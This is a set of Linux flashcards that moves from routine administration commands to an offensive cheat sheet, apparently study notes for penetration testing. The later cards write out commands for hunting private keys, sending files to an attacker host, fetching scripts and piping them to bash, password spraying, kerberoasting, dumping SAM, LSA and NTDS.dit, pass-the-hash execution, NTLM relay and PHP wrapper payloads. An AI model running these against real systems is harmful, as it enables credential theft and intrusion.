Useful Linux Commands Flashcards
You must know all of these 100%
Show system information
uname -a
Display memory usage
free -h
Show disk space usage
df -h
Show disk usage per directory
du -sh [directory]
Show running processes
ps aux
Show real-time system resource usage
top
Interactive system monitoring tool
htop
Show system uptime and load average
uptime
Display last system boot time
who -b
Show currently logged-in users
who
Show last login history
last
Check system logs
journalctl -xe
Show kernel logs
dmesg
Display open network connections
netstat -tulnp
Display listening ports
ss -tulnp
Display current network interfaces and IP addresses
ip a
Restart a service
systemctl restart [service]
Stop a service
systemctl stop [service]
Start a service
systemctl start [service]
Enable a service to start on boot
systemctl enable [service]
Disable a service from starting on boot
systemctl disable [service]
Check service status
systemctl status [service]
List all active services
systemctl list-units --type=service
Show disk partitions
lsblk
Show detailed partition information
fdisk -l
Mount a filesystem
mount [device] [mount_point]
Unmount a filesystem
umount [mount_point]
Check disk health (SMART)
smartctl -a /dev/sdX
Create a new user
useradd -m [username]
Delete a user
userdel -r [username]
Change user password
passwd [username]
Add a user to a group
usermod -aG [groupname] [username]
Show group memberships for a user
groups [username]
Show system resource limits
ulimit -a
Monitor real-time system logs
tail -f /var/log/syslog
Shut down the system immediately
shutdown -h now
Reboot the system
reboot
Securely delete a file
shred -u [file_name]
List files in a directory
ls -lah
Change directory
cd [directory]
Create a new directory
mkdir [directory]
Remove an empty directory
rmdir [directory]
Remove a directory and its contents
rm -rf [directory]
Copy a file
cp [source] [destination]
Move or rename a file
mv [source] [destination]
Create a new empty file
touch [file_name]
View file contents
cat [file_name]
Display file contents with pagination
less [file_name]
Show the first 10 lines of a file
head [file_name]
Show the last 10 lines of a file
tail [file_name]
Find files by name
find /path/to/search -name "[file_name]"
Find files larger than 1GB
find / -size +1G
Search for a string inside files
grep "pattern" [file]
Search recursively in directories
grep -r "pattern" /path/to/directory
Show file type
file [file_name]
Change file permissions
chmod 755 [file_name]
Change file ownership
chown user:group [file_name]
Compress a file with gzip
gzip [file_name]
Decompress a gzip file
gunzip [file_name.gz]
Compress a file with bzip2
bzip2 [file_name]
Decompress a bzip2 file
bunzip2 [bzip file]
Create a tar archive
tar -cvf archive.tar [directory]
Extract a tar archive
tar -xvf archive.tar
Create a compressed tar.gz archive
tar -czvf archive.tar.gz [directory]
Extract a tar.gz archive
tar -xzvf archive.tar.gz
Create a compressed tar.bz2 archive
tar -cjvf archive.tar.bz2 [directory]
Extract a tar.bz2 archive
tar -xjvf archive.tar.bz2
How to use scp?
scp [user]@[remote ip]:/path/to/file
How to add something to $PATH?
export PATH="[new path to add]:$PATH"
How to port forward SSH
ssh -L [lport]:[lhost]:[rport] [user]@[rhost]
How to search for ssh keys on a system
grep -rnw "PRIVATE KEY" /* 2>/dev/null | grep ":1"
How to manually make http request
exec 3<>/dev/tcp/[ip]/[port]
echo -e "GET /LinEnum.sh HTTP/1.1\n\n">&3
cat <&3
How to make a python https upload server which takes POST
python3 -m virtualenv . && sudo python3 -m pip install --user uploadserver && openssl req -x509 -out server.pem -keyout server.pem -newkey rsa:2048 -nodes -sha256 -subj '/CN=server' && sudo python3 -m uploadserver 443 --server-certificate ~/server.pem
How to start an SSH server
useradd -m [username]
sudo systemctl enable sshd
How to start a python3 http server?
python3 -m http.server
How to start a python2 http server?
python2.7 -m SimpleHTTPServer
How to start a PHP http server?
php -S 0.0.0.0:8000
How to start a ruby http server?
ruby -run -ehttpd . -p8000
How to GET with http python2
python2.7 -c 'import urllib;urllib.urlretrieve ([url])'
How to GET with http python3
python3 -c 'import urllib.request;urllib.request.urlretrieve([url],[out file name])'
How to POST with http python3
python3 -c 'import requests;requests.post("http://<attack>:8000/upload",files={"files":open(<filename>,"rb")})'
How to start a python3 http upload server?
python3 -m virtualenv . && python3 -m uploadserver
How to GET with http PHP?
php -r '$file = file_get_contents([url]); file_put_contents([outfile name],$file);'
How to GET with PHP fopen()?
php -r 'const BUFFER = 1024; $fremote = fopen([url], "rb"); $flocal = fopen([out file name], "wb"); while ($buffer = fread($fremote, BUFFER)) { fwrite($flocal, $buffer); } fclose($flocal); fclose($fremote);'
How to do fileless download PHP?
php -r '$lines = @file([url]); foreach ($lines as $line_num => $line) { echo $line; }' | bash
How to GET with http ruby?
ruby -e 'require "net/http"; File.write([outfile name], Net::HTTP.get(URI.parse([url])))'
How to GET with http perl?
perl -e 'use LWP::Simple; getstore([url], [outfile name]);'
How to upload file with netcat?
cat [file] | nc [ip] [port]
How to download file with netcat?
nc -nvlp [port] > [out_file]
How to upload file with ncat?
ncat --send-only [target ip] 8000 < file-to-transfer.txt
How to upload
To create a certificate on a target machine: openssl req -newkey rsa:2048 -nodes -keyout key.pem -x509 -days 365 -out certificate.pem
Run this on attacking machine: openssl s_server -quiet -accept 80 -cert certificate.pem -key key.pem < /tmp/LinEnum.sh
Download the file from target machine: openssl s_client -connect 10.10.10.32:80 -quiet > LinEnum.sh
How to start a python3 ftp server for downloading?
python3 -m virtualenv . && sudo pip3 install pyftpdlib && sudo python3 -m pyftpdlib --port 21
How to start a python3 ftp server for uploading?
python3 -m virtualenv . && sudo pip3 install pyftpdlib && sudo python3 -m pyftpdlib --port 21 --write
How to mount a filesystem with rdp rdesktop?
rdesktop [hostname] -d [domain] -u [user] -p [pass] -r disk:linux=[path]
How to mount a filesystem with rdp xfreerdp?
xfreerdp /v:[hostname] /d:[domain] /u:[user] /p:[pass] /drive:linux,[path]
How to start rlogin session?
rlogin [ip] -l [user]
How to pull all files in an rsync share?
rsync -av rsync://[hostname]/[share]
How to list contents of an rsync share?
rsync -av --list-only rsync://[hostname]/[share]
How to connect to oracledb service?
sqlplus [user]/[pass]@[oracledb server ip]/[sid]
How to connect to an ftp server?
ftp [user]@[ip] [port]
How to connect to an ftp server in passive mode?
ftp [user]@[ip] [port] -p
How to mount an NFS share?
sudo mkdir /mnt/target-NFS && sudo mount -t nfs [ip]:/ /mnt/target-NFS/ -o nolock
How to unmount an NFS share?
cd /mnt && sudo umount ./target-NFS
How to connect to an SMTP server?
telnet [ip] 25
How to login to SMTP from commandline?
AUTH LOGIN
give base64 encoded creds
How to compose an email via command line?
MAIL FROM:[email]
RCPT TO:[email]
DATA
Subject: [subject]
From: [email]
To: [email]
body of email
.
How to log out from SMTP server?
QUIT
How to connect to mysql?
mysql -u [user] -h [ip] -p[pass]
How to check domain info for linux domain joined host?
realm list
How to kerberoast with impacket
GetUserSPNs.py [Domain/Username:password] -dc-ip [dc_ip] -request
How to kerberoast on domain joined machine rubeus?
Rubeus.exe kerberoast
How to check if smbexec is enabled with smbmap?
smbmap -H $ip -u [username] -p [password] -x "whoami"
How to map an smb share with smbmap?
smbmap -H [ip] -u [username] -p [password] -r [share name]
How to spray passwords for AD users?
nxc smb [host] -u [wordlist of users] -p [password wordlist] --continue-on-success
How to spray hashes for AD users?
nxc smb [host] -u [wordlist of users] -H [hash list] --continue-on-success
How to check if smb exec is enabled with nxc?
nxc smb [ip] -u [user] -d [domain] -p [pass] -x whoami
How to check if smb exec is enabled with nxc and execute command with local admin?
nxc smb [ip] -u [user] -d [domain] -p [pass] -x whoami --local-auth
How to enumerate smb shares with nxc?
crackmapexec smb [ip] -u [user] -p [pass] --shares
How to enumerate domain users with rid brute?
nxc smb $ip -u [user] -p [pass] --rid-brute
How to remotely dump lsa?
crackmapexec smb [ip] --local-auth -u 'admin' -p [pass] --lsa
How to remotely dump SAM?
crackmapexec smb [ip] --local-auth -u 'admin' -p [pass] --sam
How to remotely dump NTDS.dit
crackmapexec smb [ip] -u [user] -p [pass] --ntds
How to remotely execute commands with wmi?
wmiexec.py [user]:[pass]@[ip] [command]
How to remotely execute commands with wmi by passing a hash?
python3 wmiexec.py [user]:[pass]@[ip] -hashes [hash] [command]
How to psexec remotely?
python3 psexec.py [user]:[pass]@[ip] [command]
How to find AS-REP roastable users?
ldapdomaindump -u '[domain]\[user]' -p [pass] [ip]
How to AS-REP roast with user list?
python3 GetNPUsers.py -dc-ip [ip] [domain]/ -usersfile users.txt
How to crack AS-REP roast hashes?
hashcat -m 18200 [hashes] [wordlist] --force
How to set up an NTLM relay smb server? 1
python3 ntlmrelayx.py -smb2support -o hashfile
How to set up an NTLM relay smb server? 2
impacket-smbserver -smb2support -ip 0.0.0.0 test /tmp
How to enumerate AD Users using smb exec?
python3 GetADUsers.py [domain]/[user]:[pass] -dc-ip [ip]
How to enumerate AD Users using smb exec by passing the hash?
python3 GetADUsers.py [domain]/[user]@[ip] -hashes [hash]
How to mount an smb share
sudo mount -t cifs -o username=plaintext,password=[pass],domain=. //[ip]/[share] /mnt/share
How to mount an smb share with a credential file
mount -t cifs //[ip]/[share] /mnt/share -o credentials=/path/credentialfile
How to connect to an MSSQL database remotely?
sqsh -S [ip] -U [user] -P [pass]
How to restart apache?
sudo systemctl restart apache2
How to use php filter to include a php file
php://filter/read=convert.base64-encode/resource=/index/php
How to use data wrapper php
?file=data://text/plain;base64,<base64_payload>
How to use input wrapper php
file=input://, payload in body
How to use zip wrapper php
file=zip://path/to/zip#path/to/file